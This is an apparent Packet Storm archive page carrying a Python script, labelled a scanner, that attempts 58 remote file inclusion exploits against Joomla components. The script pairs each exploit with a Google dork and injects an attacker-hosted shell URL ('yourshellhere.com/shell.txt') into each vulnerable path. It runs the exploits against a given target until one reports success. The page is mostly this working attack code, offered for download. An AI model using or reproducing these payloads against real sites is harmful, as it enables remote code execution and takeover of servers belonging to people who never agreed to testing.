what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Exploit Scanner

Joomla Exploit Scanner
Posted Oct 14, 2010
Authored by Jesus Olmos Gonzalez

This python script scans for 58 vulnerable Joomla component payloads.

tags | tool, scanner, python
systems | unix
SHA-256 | 26c1dd792718beea62e8eb0ab2d6c9e865e5fd26795e1320d27ddd6b697c5805

Joomla Exploit Scanner

Change Mirror Download
#!/usr/bin/python
# Multi exploit para joomla by jolmos@buguroo.com
# Implements the 58 joomla exploits sumarized by Mr.aFiR_ on http://www.exploit-db.com/papers/13633/

import urllib2
import re
import sys


class Exploit:
def __init__(self,dork,url):
self.url = url
self.dork = dork

def run(self,target,rfishell):
xplt = self.url
xplt = xplt.replace('##',rfishell)
url = '%s%s' % (target,xplt)
try:
req = urllib2.urlopen(url)
data = req.read()
if data.find('o2ij3oiwudjf') == -1:
print "[ Failed ] %s" % url
return False

print "[ Exploited!! ] %s" % url
return True
except:
print "[ 404 ] %s" % url
return False



class MultiExploit:
def __init__(self):
self.exploits = []
self.rfishell = 'http://yourshellhere.com/shell.txt???'
self.load()

def load(self):
self.exploits.append(Exploit('inurl:"com_admin"','/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:index.php?option=com_simpleboard','/components/com_simpleboard/file_upload.php?sbp=##'))
self.exploits.append(Exploit('inurl:"com_hashcash"','/components/com_hashcash/server.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_htmlarea3_xtd-c"','/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_sitemap"','/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_performs"','/components/com_performs/performs.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_forum"','/components/com_forum/download.php?phpbb_root_path=##'))
self.exploits.append(Exploit('inurl:"com_pccookbook"','/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:index.php?option=com_extcalendar','/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"minibb"','/components/minibb/index.php?absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_smf"','/components/com_smf/smf.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_smf"','/modules/mod_calendar.php?absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_pollxt"','/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_loudmounth"','/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_videodb"','/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:index.php?option=com_pcchess','/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_multibanners"','/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_a6mambohelpdesk"','/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=##'))
self.exploits.append(Exploit('inurl:"com_colophon"','/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_mgm"','/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_mambatstaff"','/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/configinsert.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_securityimages"','/components/com_securityimages/lang.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_artlinks"','/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_galleria"','/components/com_galleria/galleria.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_akocomment"','/akocomments.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_cropimage"','/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=##'))
self.exploits.append(Exploit('inurl:"com_kochsuite"','/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_comprofiler"','/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_zoom"','/components/com_zoom/includes/database.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_serverstat"','/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:"com_fm"','/components/com_fm/fm.install.php?lm_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mambelfish','/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_lmo','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_linkdirectory','/components/com_lmo/lmo.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_linkdirectory','/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mtree','/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_jim','/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_webring','/administrator/components/com_webring/admin.webring.docs.php?component_dir=##'))
self.exploits.append(Exploit('inurl:com_remository','/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path='))
self.exploits.append(Exploit('inurl:com_babackup','/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_lurm_constructor','/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mambowiki','/components/com_mambowiki/MamboLogin.php?IP=##'))
self.exploits.append(Exploit('inurl:com_a6mambocredits','/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=##'))
self.exploits.append(Exploit('inurl:com_phpshop','/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_cpg','/components/com_cpg/cpg.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_moodle','/components/com_moodle/moodle.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_extended_registration','/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mospray','/components/com_mospray/scripts/admin.php?basedir=##'))
self.exploits.append(Exploit('inurl:com_bayesiannaivefilter','/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_uhp','/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_peoplebook','/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_mmp','/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_reporter','/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_madeira','/components/com_madeira/img.php?url=##'))
self.exploits.append(Exploit('inurl:com_jd-wiki','/components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=##'))
self.exploits.append(Exploit('inurl:com_bsq_sitestats','/components/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))
self.exploits.append(Exploit('inurl:com_bsq_sitestats','/com_bsq_sitestats/external/rssfeed.php?baseDir=##'))

def launch(self,target):
for xplt in self.exploits:
if xplt.run(target,self.rfishell):
return


if __name__ == '__main__':
if (len(sys.argv) != 2):
print 'usage: %s http://vulnerable.com/joomla/'
sys.exit(1)

me = MultiExploit()
me.launch(sys.argv[1])

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close